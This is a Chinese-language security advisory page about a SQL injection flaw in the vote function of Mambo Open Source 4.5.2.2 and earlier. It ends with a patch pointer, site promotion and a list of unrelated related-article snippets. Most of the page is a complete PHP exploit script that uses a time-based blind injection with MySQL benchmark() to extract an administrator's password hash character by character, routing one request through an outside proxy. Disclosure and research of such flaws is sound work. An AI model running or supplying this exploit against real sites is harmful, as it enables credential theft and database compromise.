发布日期:2005-06-16更新日期:2005-06-16受影响系统:

Mambo Mambo Open Source <= 4.5.2.2不受影响系统:

Mambo Mambo Open Source 4.5.2.3描述:

BUGTRAQ  ID: 13966Mambo是一款开放源代码的WEB内容管理系统。Mambo的com_contents中存在严重的SQL注入漏洞,远程攻击者可能利用此漏洞非法操作数据库。  -- content.php --  100             case 'vote':  101                     recordVote ( $url , $user_rating , $cid ,  $database);  102                     break;  ...  1478                                    $query = "UPDATE  #__content_rating"  1479                                    . "\n SET rating_count =  rating_count + 1,"  1450                                    . "\n rating_sum = rating_sum  + $user_rating,"  1451                                    . "\n lastip = '$currip'"  1452                                    . "\n WHERE content_id = ". $cid  1453                                    ;  ----------------在1450行$user_rating未经任何验证便使用用户提供的数据,导致用户可以获得敏感信息。测试方法:

警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!*/if (!(function_exists('curl_init'))) {    echo "cURL extension required\n";    exit;}ini_set("max_execution_time","999999");$benchcount = 150000;$aid= 62;$cid = 2;$charmap = array (48,49,50,51,52,53,54,55,56,57,          97,98,99,100,101,102,          103,104,105,          106,107,108,109,110,111,112,113,          114,115,116,117,118,119,120,121,122          );          if($argv[1]){        $url = $argv[1];    if ($argv[2])        $aid = $argv[2];    if ($argv[3])        $benchcount = $argv[3];    if ($argv[4])        $proxy = $argv[4]; }else {    echo "Usage: ".$argv[0]." [userid] [benchmarkcount] [proxy]\n\n";    echo "\tURL\t URL to mambo site (ex: http://127.0.0.1)\n";    echo "\taid\t userid to get  (default: 62 (admin))\n";    echo "\tbenchmarkcount\t benchmark count  (default: 150000)\n";    echo "\tproxy\t optional proxy url  (ex: http://10.10.10.10:8080)\n";     exit;}// rate from different ip (using http://projectbypass.com)$projectbypass = "http://projectbypass.com/nph-proxy3.cgi/010110A/";$ch = curl_init();curl_setopt($ch, CURLOPT_URL,$projectbypass.str_replace("://","/",$url)."/index.php?op \tion=com_content&task=vote&id=1&Itemid=1&cid=$cid&user_rating=1"); curl_setopt($ch, \CURLOPT_RETURNTRANSFER,1); $res = curl_exec($ch);curl_close ($ch);// standard page loading time$start = time();$ch = curl_init();if ($proxy){    curl_setopt($ch, CURLOPT_PROXY,$proxy); }curl_setopt($ch, CURLOPT_URL,$url);curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);$res  = curl_exec($ch);curl_close ($ch);$stop = time();$sloadtime = floatval($stop - $start);echo "standard page loading =".$sloadtime."\n"; // benchmark page loading time$start = time();$ch = curl_init();if ($proxy){    curl_setopt($ch, CURLOPT_PROXY,$proxy); }curl_setopt($ch, CURLOPT_URL,$url."/index.php?option=com_content&task=vote&id=1&Itemid \=1&cid=$cid&user_rating=1,rating_sum=(select+1+from+mos_users+where+if(2>1,benchmark($ \benchcount,md5(1)),1))+where+content_id=$cid/*"); curl_setopt($ch, \CURLOPT_RETURNTRANSFER,1); $res = curl_exec($ch);curl_close ($ch);$stop = time();$bloadtime = floatval($stop - $start);echo "bencmark page loading =".$bloadtime."\n"; // check if SQL query failedif (ereg("DB function failed",$res)){    echo "[x] mysql < 4.1 detected - not exploitable\n";    exit();}if ($bloadtime <= $sloadtime + 2){    echo "[x] increase your benchmark count\n";    exit();}echo "Take your time for Teh Tarik... please wait ...\n\n";echo "Result:\n";echo "\tUserid = $aid\n";echo "\tPassword Hash = ";// starting fetch password$benchcount = $benchcount*2;        for($i= 1;$i< 33;$i++){     foreach ($charmap as $char){        $start = time();        echo chr($char);        $ch = curl_init();        if ($proxy){            curl_setopt($ch, CURLOPT_PROXY,$proxy);         }        curl_setopt($ch, CURLOPT_URL,$url."/index.php?option=com_content&task=vote&id=1&Item \id=1&cid=$cid&user_rating=1,rating_sum=(select+password+from+mos_users+where+id=$aid+a \nd+if(ascii(substring(password,$i,1))=$char,benchmark($benchcount,md5(1)),1))+where+co \ntent_id=$cid/*");  curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);        $res=curl_exec ($ch);        curl_close ($ch);        $stop = time();        $xloadtime = floatval($stop - $start);        if (floatval($xloadtime) > $bloadtime){            $hash .= chr($char);            break 1;        }        else {            echo chr(8);        }                if ($char == 103){            echo "\n\n\tNot Vulnerable or Something wrong occur ...\n";            exit;        }            }}echo "\n";?>建议:

厂商补丁:Mambo-----目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载4.5.2.3版本:http://mamboforge.net/frs/download.php/6151/MamboV4.5.2.3-stable.tar.g z

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

mambo 服务商规定的mysql密码,Mambo com_content远程SQL注入漏洞相关推荐

  1. mysql注入漏洞语句,web安全之sql注入漏洞

    概念 通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令.通俗地讲,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力 ...

  2. 绕过waf mysql爆库_iwebsec刷题记录-SQL注入漏洞

    被推荐了这个web平台,感觉挺适合新手的,网上搜了下没看到有人写wp,这里本入门萌新来稍微整理下自己解题的过程 SQL注入漏洞 01-数字型注入 http://localhost:32774/sqli ...

  3. 【Mysql优化安全】防止sql注入

    [Mysql安全]防止sql注入 (1)什么是sql注入 (2)寻找sql注入的方法 (3)mybatis是如何做到防止sql注入的 (3.1)sql对比 (3.2)简单分析 (3.3)底层实现原理 ...

  4. 米拓5.3 mysql支持off,Metinfo 5.3.17 前台SQL注入漏洞分析

    Metinfo 8月1日升级了版本,修复了一个影响小于等于5.3.17版本(几乎可以追溯到所有5.x版本)的SQL注入漏洞.这个SQL注入漏洞不受软WAF影响,可以直接获取数据,影响较广. 漏洞出现在 ...

  5. 【安全】【SQL注入漏洞】通过sql注入获取数据库管理员密码

    本博客中使用封神台靶标系统进行演示,靶标系统网站. 一.判断网站是否存在sql注入漏洞 1.在地址栏写入?id=1 and 1=1,回车 页面返回正常. 2.在地址栏写入?id=1 and 1=2,回 ...

  6. php mysql 注入漏洞_PHP安全:SQL注入漏洞防护

    原标题:PHP安全:SQL注入漏洞防护 SQL注入是最危险的漏洞之一,但也是最好防护的漏洞之一.本文介绍在PHP的编码中合理地使用MySQL提供的预编译进行SQL注入防护,在PHP中使用PHP数据对象 ...

  7. MySQL攻略 - JDBC程序SQL注入,PreparedStatement接口详解与案例练习,JDBC相关API小结

    文章目录 SQL注入 Statement详解 基本介绍 Navicat演示SQL注入 JDBC演示SQL注入 PreparedStatement详解 基本介绍 预处理好处 预处理案例(selete语句 ...

  8. mysql sql注入漏洞修复_从Java角度修复SQL注入漏洞

    很多情况因为过滤不严导致很多网站存在sql注入,这里以用户登陆为例,简单举例 首先创建一个测试的数据库 比较基础,不写创建过程了 java代码如下: packagecn.basic.jdbc;impo ...

  9. php万能注入密码,php下的SQL注入万能用户名和密码

    1.针对有单引号的情况 : 万能密码 : select * from users where username='xxxx' and password='xxxxxx' or 1='1'; 万能用户名 ...

最新文章

  1. c#和python_IronPython和C#交互
  2. Linux档案属性与目录配置
  3. 第43讲:灵活好用的 Spider 的用法
  4. Field EXP_REVENUE
  5. AutoMapper用法一瞥
  6. 【转】【最小树形图】有向图的最小生成树【朱刘算法】
  7. 厦门GDP超过万亿需要多少年时间?
  8. 深入理解java虚拟机【内存溢出实例】
  9. ubuntu vscode通过cmake配置c++和VS2019一样 进行调试
  10. Atitit s2018 s3 doc list alldvc.docx .docx s2018 s3f doc compc s2018 s3f doc homepc sum doc dvcCom
  11. Jersey入门教程
  12. LM2596、LM2576
  13. UReport2导出报错
  14. 听湖畔大学:史玉柱谈企业文化
  15. java 获取视频第一帧 | Java工具类
  16. 使用 Python 从谷歌搜索结果中抓取图像
  17. 数独项目Last弹:网络识别PIAN
  18. 自动化运维之k8s——Helm、普罗米修斯、EFK日志管理、k8s高可用集群(未完待续)
  19. 数据分析 - 跨境电商爬虫成长记 之 第三篇:完整的爬虫工作环节有哪些
  20. 浅析缓冲区溢出漏洞的利用与Shellcode编写

热门文章

  1. 支付宝 php 获取交易时间,问一个在线支付的场景问题,如果支付宝回调通知延时怎么办?...
  2. 三国志战略版:乐进再获加强_更新解读
  3. Uboot Makefile 中 $(origin variable)详解
  4. 【设计模式第一弹】策略模式
  5. 【边拆边聊14G】Purley平台的超强演绎!
  6. 巴科斯范式(EBNF, Extended Backus–Naur Form)
  7. 人工智能基础:迁移学习对抗学习简述
  8. Java Calendar类 练习题:为孙工找到当月休息日
  9. 全新链游【恐龙世界/侏罗纪】游恐龙世界NFT链游区块链上链质押盲盒NFT游戏PK对战
  10. 【Vue ECharts开发】自定义echarts柱状图颜色渐变效果